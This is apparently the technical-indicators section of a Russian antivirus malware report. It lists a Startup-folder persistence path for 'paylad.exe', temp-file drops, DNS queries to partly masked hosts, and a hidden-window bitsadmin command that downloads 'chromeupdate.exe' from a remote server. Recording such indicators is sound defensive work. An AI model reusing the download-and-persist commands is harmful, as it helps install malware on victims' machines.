Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\paylad.exe
- paylad.exe
- %TEMP%\bit2edc.tmp
- %TEMP%\bit2edc.tmp
- %TEMP%\bit2edc.tmp в %TEMP%\paylad.exe
- 'ro##ev.ga':80
- 'microsoft.com':80
- http://ro##ev.ga/chromeupdate.exe
- DNS ASK ro##ev.ga
- DNS ASK df####.duckdns.org
- DNS ASK microsoft.com
- '%TEMP%\paylad.exe'
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 http://ro##ev.ga/chromeupdate.exe %TEMP%\paylad.exe' (со скрытым окном)
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 http://ro##ev.ga/chromeupdate.exe %TEMP%\paylad.exe